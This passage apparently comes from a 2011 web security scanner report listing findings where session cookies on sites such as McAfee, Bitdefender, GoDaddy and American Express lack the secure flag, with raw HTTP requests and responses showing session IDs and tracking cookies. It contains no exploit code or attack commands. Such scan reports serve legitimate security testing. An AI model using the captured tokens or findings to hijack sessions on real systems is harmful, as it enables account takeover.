Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.59.10.1303002182

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Location: http://cc.dealer.com/views/error?errorId=20110417-6124c901404638bf01d3e3f32d3febab
Content-Length: 0
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:48:11 GMT
Connection: keep-alive
Set-Cookie: ssoid=6124c8ff404638bf01d3e3f3d1ff707a;path=/;domain=.dealer.com
Set-Cookie: JSESSIONID=53tc30bjqdllv;path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT

8.3. https://community.qualys.com/docs/DOC-1542  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://community.qualys.com
Path:   /docs/DOC-1542

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /docs/DOC-1542 HTTP/1.1
Host: community.qualys.com
Connection: keep-alive
Referer: https://browsercheck.qualys.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserCookie=172.16.1.14.146041303044897733; __utmz=64045999.1303044904.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64045999.1579957593.1303044904.1303044904.1303044904.1; __utmc=64045999; __utmb=64045999.2.10.1303044904; _jsuid=9968629672415245526; __ytrksn=8QU1PX4T5CFN332MTYVW; __ytrkid=TH2NMH8440GCXGY6L9XQ

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:59:56 GMT
Server: Apache-Coyote/1.1
X-JAL: 133
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.server.info="serverName=community.qualys.com:serverPort=443:contextPath=:localName=qualys-inc-external-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; Version=1; Path=/
Set-Cookie: JSESSIONID=288BC31E084BC039114BDA47E027F3E4.; Path=/
Set-Cookie: jive.recentHistory.-1=3130322c313534323b; Expires=Tue, 17-May-2011 12:59:56 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=155817 t=1303045196476096
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerPool_VM030=3892738058.20480.0000; path=/
Content-Length: 108829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
8.4. https://email.phelps.com/exchweb/bin/auth/owaauth.dll  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://email.phelps.com
Path:   /exchweb/bin/auth/owaauth.dll

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /exchweb/bin/auth/owaauth.dll HTTP/1.1
Host: email.phelps.com
Connection: keep-alive
Referer: https://email.phelps.com/exchweb/bin/auth/owalogon.asp?url=https://email.phelps.com/exchange&reason=0&replaceCurrent=1
Cache-Control: max-age=0
Origin: https://email.phelps.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 117

destination=https%3A%2F%2Femail.phelps.com%2Fexchange&flags=0&forcedownlevel=0&trusted=0&username=&password=&isUtf8=1

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://email.phelps.com/exchange
Server: Microsoft-IIS/7.0
Set-Cookie: sessionid=51f31231-e086-4093-b79d-88f46ebaa64c; path=/
Set-Cookie: cadata="0JYNAs7OHr9rX0/8d5d4eJnG1FqR4YAWGicAHaA=="; HttpOnly; secure; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 14:14:41 GMT

8.5. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /WebServices/AccountWebSvc.asmx/js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WebServices/AccountWebSvc.asmx/js HTTP/1.1
Host: home.mcafee.com
Connection: keep-alive
Referer: https://home.mcafee.com/secure/cart/?offerId=285986&PkgQty=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0; isvt_visitor=yNo98QoBC2cAABJDQT4AAAAAAB1JCVeen0VKRW; WT_FPC=id=20dc5aca13b81baa15d1303034109486:lv=1303034109486:ss=1303034109486; s_cc=true; s_vi=[CS]v1|26D5719A051D00E9-600001368029DFAB[CE]; IS3_History=1302573891-1-74_3--1__3_; IS3_GSV=DPL-2_TES-1303044907_PCT-1303044907_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; s_nr=1303045175869-New; s_ev8=%5B%5B%27mcafee%27%2C%271303045175870%27%5D%5D; s_sq=mcafeecomglobal%3D%2526pid%253Dconsumer%25253Aen-us%25253Adirect-0-mcafee%25253Afree_services%25253Afreescan_scan_initiated%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253Alocation.href%25253D%252522http%25253A//promos.mcafee.com/offer.aspx%25253Fid%25253D285986%252522%25253Bretu%2526oidt%253D2%2526ot%253DSUBMIT; FSRCookie=isAlive=0||ForeseeLoyalty=1||previousURL=http%253A//home.mcafee.com/downloads/free-virus-scan; session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; SessionInfo=AffiliateId=0; lBounceURL=http://home.mcafee.com/secure/cart/?offerId=285986&PkgQty=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d285986%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=7eb93d4df8d699b83f918264443cd1115c4a4c55590b0215&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; IscartemptySiteidAffid=no-1-0; currentURL=https%3A//home.mcafee.com/secure/cart/%3FofferId%3D285986%26PkgQty%3D1; foresee.alive=1303045190597

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript; charset=utf-8
Expires: Wed, 14 Apr 2010 12:06:21 GMT
Last-Modified: Thu, 14 Apr 2011 12:06:21 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:53 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 17-Apr-2041 12:59:53 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:53 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:53 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d285986%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=7eb93d4df8d699b83f918264443cd1115c4a4c55590b0215&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV9
X-UA-Compatible: IE=8
Date: Sun, 17 Apr 2011 12:59:53 GMT
Content-Length: 4551

Type.registerNamespace('McAfee.WebServices');
McAfee.WebServices.AccountWebSvc=function() {
McAfee.WebServices.AccountWebSvc.initializeBase(this);
this._timeout = 0;
this._userContext = null;
thi
...[SNIP]...
8.6. https://home.mcafee.com/secure/cart/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /secure/cart/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/cart/?offerId=285986&PkgQty=1 HTTP/1.1
Host: home.mcafee.com
Connection: keep-alive
Referer: http://promos.mcafee.com/offer.aspx?id=285986
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0; isvt_visitor=yNo98QoBC2cAABJDQT4AAAAAAB1JCVeen0VKRW; WT_FPC=id=20dc5aca13b81baa15d1303034109486:lv=1303034109486:ss=1303034109486; SiteID=1; SessionInfo=AffiliateId=0; HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; s_cc=true; s_vi=[CS]v1|26D5719A051D00E9-600001368029DFAB[CE]; IS3_History=1302573891-1-74_3--1__3_; IS3_GSV=DPL-2_TES-1303044907_PCT-1303044907_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; s_nr=1303045175869-New; s_ev8=%5B%5B%27mcafee%27%2C%271303045175870%27%5D%5D; s_sq=mcafeecomglobal%3D%2526pid%253Dconsumer%25253Aen-us%25253Adirect-0-mcafee%25253Afree_services%25253Afreescan_scan_initiated%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253Alocation.href%25253D%252522http%25253A//promos.mcafee.com/offer.aspx%25253Fid%25253D285986%252522%25253Bretu%2526oidt%253D2%2526ot%253DSUBMIT; foresee.alive=1303045176255; currentURL=blank; FSRCookie=isAlive=0||ForeseeLoyalty=1||previousURL=http%253A//home.mcafee.com/downloads/free-virus-scan; Locale=en%2Dus; lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; AffID=0; langid=1; lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26langid%3D1; session%5Fdata=%3CSessionData%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E0%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E0%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%3C%2FSessionData%3E%0D%0A

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 17-Apr-2041 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart/?offerId=285986&PkgQty=1; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d285986%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=720ea228faf811942ab0037780d0be935c4a4c55590b0216&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV10
X-UA-Compatible: IE=8
Date: Sun, 17 Apr 2011 12:59:41 GMT
Content-Length: 46143


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
8.7. https://home3.ca.com/Login2.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home3.ca.com
Path:   /Login2.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login2.aspx?ReturnUrl=%2fMembers%2fDefault.aspx%3flang%3den-US&lang=en-US HTTP/1.1
Host: home3.ca.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; IS3_History=1301114230-2-91_0--2__0_0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 12:59:01 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Server-Name: CH1-BLW06
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rxpdf225tvaoaj45mhghiufz; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 14812


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="ctl00_siteHeader"><title>
   
Account Informati
...[SNIP]...
8.8. https://myaccount.bitdefender.com/site/MyAccount/login/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myaccount.bitdefender.com
Path:   /site/MyAccount/login/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/MyAccount/login/ HTTP/1.1
Host: myaccount.bitdefender.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _country=us; s_vi=[CS]v1|26D5718A851D098B-40000144C01B87EA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:52:34 GMT
Server: Apache
Set-Cookie: PHPSESSID=0jjt2ounle0kk4pc00ar32s852; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=3, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>MyAccount - Login</title>


<m
...[SNIP]...
8.9. https://secure.eset.com/us/store/geoIpRedirect  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.eset.com
Path:   /us/store/geoIpRedirect

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/store/geoIpRedirect HTTP/1.1
Host: secure.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:03:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=naf8til2k8arkr96bub4gpr1l1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 68
Connection: close
Content-Type: text/html; charset=UTF-8

var esetIpTracker = { "country": "US", "blocked": false, "url": "" }
8.10. https://secure.opinionlab.com/ccc01/comment_card.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDQQRASABB=GLICDNMAAPCGFBJAFDNMGBBP; path=/
Date: Sun, 17 Apr 2011 13:03:49 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...
8.11. https://www.box.net/api/1.0/import  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.box.net
Path:   /api/1.0/import

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/1.0/import HTTP/1.1
Host: www.box.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 17 Apr 2011 14:21:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=8td87ko47k7q53dt7seepr17e2; path=/; domain=.box.net; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: box_visitor_id=4daaf75186f3b5.49804594; expires=Mon, 16-Apr-2012 14:21:05 GMT; path=/; domain=.box.net
Content-Length: 14151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Add this file to your Box</title>
   <meta http-equiv="X
...[SNIP]...
8.12. https://www.fathomseo.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fathomseo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.fathomseo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:15:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30798
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSADQDTAD=FCKHKPGBANODOMJIEOGIMGKJ; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<
...[SNIP]...
8.13. https://www.godaddy.com/domains/popups/icannfee.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/popups/icannfee.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/popups/icannfee.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=yakdug55q042cwfev0d0at55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: SplitValue1=49; domain=godaddy.com; expires=Sun, 17-Apr-2011 13:53:59 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/popups/icannfee.aspx&server=M1PWCORPWEB126&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=49; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 15-Apr-2012 13:53:59 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 16 Apr 2011 13:53:58 GMT
Connection: close
Content-Length: 2105


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...
8.14. https://www.trendsecure.com/my_account/signin/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.trendsecure.com
Path:   /my_account/signin/login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my_account/signin/login HTTP/1.1
Host: www.trendsecure.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store
Expires: Sun, 17 Apr 2011 13:11:58 GMT
Date: Sun, 17 Apr 2011 13:11:58 GMT
Content-Length: 7533
Connection: close
Set-Cookie: ci_session=6f36ad88e6821a419e616f0b0f033d3a; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!--Version=<<TS_VERSION>>-->
   <head>
       <title>My Account | Sign In</title>
       <meta http-equiv="c
...[SNIP]...
8.15. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:56:28 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=00002ch3BvvUfnVaiFU5PB681_6:14qpqp8bv; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 33668


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>


<head>
